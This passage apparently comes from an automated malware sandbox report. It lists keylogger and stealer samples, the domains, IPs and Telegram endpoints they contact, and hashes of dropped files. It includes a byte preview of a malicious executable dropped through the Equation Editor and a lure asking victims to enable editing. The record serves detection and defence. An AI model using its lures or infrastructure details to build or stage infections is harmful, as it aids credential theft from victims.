                                SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                    inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                        SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                            Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              reallyfreegeoip.orgTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 188.114.97.3
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.97.3
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              mail.jhxkgroup.onlineSecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 217.12.218.219
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 217.12.218.219
                                              SecuriteInfo.com.Win32.CrypterX-gen.9884.23346.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 217.12.218.219
                                              checkip.dyndns.comTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.8.169
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.8.169
                                              SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.6.168
                                              z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 193.122.130.0
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 158.101.44.242
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 193.122.130.0
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.6.168
                                              api.telegram.orgTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 149.154.167.220
                                              inquiry.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                              • 149.154.167.220
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              TELEGRAMRUTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              http://mintlink32.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                              • 149.154.167.99
                                              https://bostempek.vercel.app/Get hashmaliciousPorn ScamBrowse
                                              • 149.154.167.99
                                              https://telegram-privatefree.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              http://tes.lavender8639.workers.dev/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              https://live-prons-sex.pages.dev/Get hashmaliciousPorn ScamBrowse
                                              • 149.154.167.99
                                              https://telegrambot-resolved.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              http://tw2-mzd.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              http://singaporeprivacygroup.vipsg3.my.id/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.99
                                              CLOUDFLARENETUS450230549.exeGet hashmaliciousAgentTeslaBrowse
                                              • 162.159.134.233
                                              64.exeGet hashmaliciousUnknownBrowse
                                              • 162.159.61.3
                                              450230549.exeGet hashmaliciousUnknownBrowse
                                              • 162.159.134.233
                                              PO-100001499.exeGet hashmaliciousFormBookBrowse
                                              • 188.114.96.3
                                              ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                              • 104.21.64.108
                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              https://qwehikd-asdu.xyz/Get hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              https://geminishdw-dws.top/Get hashmaliciousUnknownBrowse
                                              • 188.114.97.3
                                              https://geminiqwc-sw.top/Get hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              https://qwekorqw-eqo.top/Get hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              UTMEMUSTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.8.169
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 132.226.247.73
                                              rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                              • 132.226.247.73
                                              cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              ITLDC-NLUASecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 217.12.218.219
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 217.12.218.219
                                              z1RFT798549034687-HJW90789-VXT9KGUINUII.exeGet hashmaliciousAgentTeslaBrowse
                                              • 185.174.175.187
                                              rDFO68936OF-WVHU0780-FUIKTU4678G.exeGet hashmaliciousAgentTeslaBrowse
                                              • 185.174.175.187
                                              BL Draft-Invoice-Packing list-Shipping Document.pif.exeGet hashmaliciousFormBookBrowse
                                              • 185.174.173.22
                                              SecuriteInfo.com.Win32.CrypterX-gen.9884.23346.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 217.12.218.219
                                              SecuriteInfo.com.FileRepMalware.14031.20391.exeGet hashmaliciousAgentTeslaBrowse
                                              • 185.174.175.187
                                              SecuriteInfo.com.FileRepMalware.19940.26551.exeGet hashmaliciousAgentTeslaBrowse
                                              • 185.174.173.22
                                              MJI5380328-PQX82938839039-HW7V89292999.exeGet hashmaliciousAgentTeslaBrowse
                                              • 185.174.175.187
                                              rMBP0835T67-H7D67889677-VFD899U8889990998Y.exeGet hashmaliciousAgentTeslaBrowse
                                              • 185.174.175.187
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              05af1f5ca1b87cc9cc9b25185115607dPayment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.97.3
                                              Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.97.3
                                              1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.97.3
                                              K0hpP6V2fo.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                                              • 188.114.97.3
                                              AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.97.3
                                              SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.97.3
                                              Payment Slip.xlsGet hashmaliciousDBatLoader, RemcosBrowse
                                              • 188.114.97.3
                                              US0914424A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.97.3
                                              36f7277af969a6947a61ae0b815907a1Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                              • 149.154.167.220
                                              14bnOjMV2N.docGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              6b58b6.msiGet hashmaliciousPureLog StealerBrowse
                                              • 149.154.167.220
                                              RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                              • 149.154.167.220
                                              RFQ.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                              • 149.154.167.220
                                              SWIFT DETAILS-ERROR.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Exploit.CVE-2018-0798.4.26981.24309.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              No context
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:@...e...........................................................
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):708096
                                              Entropy (8bit):7.874129511837346
                                              Encrypted:false
                                              SSDEEP:12288:9Ok++Z4CujQ9TPfriopH5dvXVqml8rukCDWyFqAN6ukRLEdtTJx:9Ok++feQ9TPfrzpHPQ7r8yyQAwJg
                                              MD5:3E2EA8C3F5CA13F16F8CA1C85087F6B6
                                              SHA1:BC8727F0E142E331B34F01D2DC483DA61B24DB6B
                                              SHA-256:3E0693E5ED5EF3326BD7F6E54DB8ADC71E28540C2C3E2A60CBF8D1BDB0FF41F3
                                              SHA-512:343F33714FB819A3765A3B440E331057500EA17BD535FE02079222843C34F58A03FA17510EA091FC26DB63CBA8F4904724733AFC8EEA89672473BDCDBB354A10
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......$........... ........@.. .......................@............@.................................L...O........ ................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc.... ......."..................@..@.reloc....... ......................@..B........................H........Y..\5..........,... 7...........................................0..|........(..........(....}......{....(....}........(....}........(....}........(....}........(....}........(....}........(....}....*.0..!..........(.... l...Y m...Z..(....X.+..*....0..m........s....}..... ....}.....#......cA}..... .ig.}.....#......c.}..... .'....s....}........s....}......}......}.....(.......(.......8..........>...%..,.o....s.......{.....{....(....}......{.....{....( ...}......{.....{
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:CE338FE6899778AACFC28414F2D9498B
                                              SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                              SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                              SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.3522404970824842
                                              Encrypted:false
                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbP:IiiiiiiiiifdLloZQc8++lsJe1Mzw
                                              MD5:88EA6AE337C0115F70F604E88C69D1A8
                                              SHA1:3DA886A5E393C17B2E29F59E3432EC9700F6FEC7
                                              SHA-256:5098128A051AA10F7C6B649FA3C63C5C6C724A2BFCEC0A8D45BFF2E228B04C4A
                                              SHA-512:E5D67EBA9542B760184568C5D27AA2A858AA65D7FA93435D0B98EEDF66BD58DC4BDAFA6E817EB805240BD390BD91117F8F68F0E8580684223BA4E1324C8ADA00
                                              Malicious:false
                                              Reputation:low
                                              Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):94720
                                              Entropy (8bit):3.5361662196956067
                                              Encrypted:false
                                              SSDEEP:768:ogI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gIP:rSyemuSyemuSyemuSyemuSyemyA0pS
                                              MD5:2FDC72F70F2B3BD4630779F9559AAB59
                                              SHA1:C406978600C42C6F8964F526267FB9B0686DE1C8
                                              SHA-256:235482EB71D2C491B46CDC7ACC5000D938E3C497FCFB7E6033CF0306D701D40D
                                              SHA-512:946F55C27FD43798B3D6F0681B8341DDB7E1EC2D04CA572A4FC8C1D0CE45F6F4EF1A1012FD163F2ACBDCFC9B9AC1AC14DE1794784E022248D190CCAEAB25BBBF
                                              Malicious:false
                                              Preview:2.2.3.9.2.2.4.4.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Thu Sep 26 06:19:16 2024, length=591385, window=hide
                                              Category:dropped
                                              Size (bytes):1069
                                              Entropy (8bit):4.576571943195122
                                              Encrypted:false
                                              SSDEEP:24:8Jt12/XT82TS54s6VuSheAmuSDv3qK57u:8JW/XT824X6IShPphK9u
                                              MD5:9893C0A7A44E35F7D327283101A2BDE6
                                              SHA1:5960F28DB36D14E30A82EA06383BAAAFC6FDA5AD
                                              SHA-256:D739A352366232824CBBA173FB6F2BBA8EF4F38FAD204BE4405A340045474F60
                                              SHA-512:6222EB665DD9FAA390D90802C2E47155F473B46FE8B86BADDB33E33B300F271D8FE9F4C41D0915042BEA624A33261707C4BC305879ABDA1C1F6164080BDBF6A7
                                              Malicious:false
                                              Preview:L..................F.... ......r......r....#.e.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....:Yf:..user.8......QK.X:Yf:*...&=....U...............A.l.b.u.s.....z.1......WG...Desktop.d......QK.X.WG.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.....:Yi: .THYSSE~1.DOC..`.......WE..WE.*.........................T.h.y.s.s.e.n.k.r.u.p.p. .P.O.0.4.0.2.3.2...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\358075\Users.user\Desktop\Thyssenkrupp PO040232.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.T.h.y.s.s.e.n.k.r.u.p.p. .P.O.0.4.0.2.3.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......358075.........
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Generic INItialization configuration [folders]
                                              Category:dropped
                                              Size (bytes):76
                                              Entropy (8bit):4.8185960597187085
                                              Encrypted:false
                                              SSDEEP:3:M1LnHLXVF1qIpzCm4jcWHLXVF1qIpzCv:MlHjj2HjjI
                                              MD5:DBE6381E9AAF143E2396CFF13E7FC75E
                                              SHA1:8D9578511265D91FBC4C4F294EB0D614F6DF06E7
                                              SHA-256:41A22F94221EC0BEE30F74466B0C37BEBD381CEE6CBAD4AD7C3451CDF52B919F
                                              SHA-512:AF761CD78070F88F832D4D90CE3C8CC5FF003D30F2EFB51D0163151AA48141130571EB5CF39FAC7447A985F75A91AA139DCD334DBF2429764B6D9F29A4854159
                                              Malicious:false
                                              Preview:[doc]..Thyssenkrupp PO040232.LNK=0..[folders]..Thyssenkrupp PO040232.LNK=0..
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.4797606462020307
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                              MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                              SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                              SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                              SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                              Category:dropped
                                              Size (bytes):2
                                              Entropy (8bit):1.0
                                              Encrypted:false
                                              SSDEEP:3:Qn:Qn
                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                              Malicious:false
                                              Preview:..
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):708096
                                              Entropy (8bit):7.874129511837346
                                              Encrypted:false
                                              SSDEEP:12288:9Ok++Z4CujQ9TPfriopH5dvXVqml8rukCDWyFqAN6ukRLEdtTJx:9Ok++feQ9TPfrzpHPQ7r8yyQAwJg
                                              MD5:3E2EA8C3F5CA13F16F8CA1C85087F6B6
                                              SHA1:BC8727F0E142E331B34F01D2DC483DA61B24DB6B
                                              SHA-256:3E0693E5ED5EF3326BD7F6E54DB8ADC71E28540C2C3E2A60CBF8D1BDB0FF41F3
                                              SHA-512:343F33714FB819A3765A3B440E331057500EA17BD535FE02079222843C34F58A03FA17510EA091FC26DB63CBA8F4904724733AFC8EEA89672473BDCDBB354A10
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......$........... ........@.. .......................@............@.................................L...O........ ................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc.... ......."..................@..@.reloc....... ......................@..B........................H........Y..\5..........,... 7...........................................0..|........(..........(....}......{....(....}........(....}........(....}........(....}........(....}........(....}........(....}....*.0..!..........(.... l...Y m...Z..(....X.+..*....0..m........s....}..... ....}.....#......cA}..... .ig.}.....#......c.}..... .'....s....}........s....}......}......}.....(.......(.......8..........>...%..,.o....s.......{.....{....(....}......{.....{....( ...}......{.....{
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.4797606462020307
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                              MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                              SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                              SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                              SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
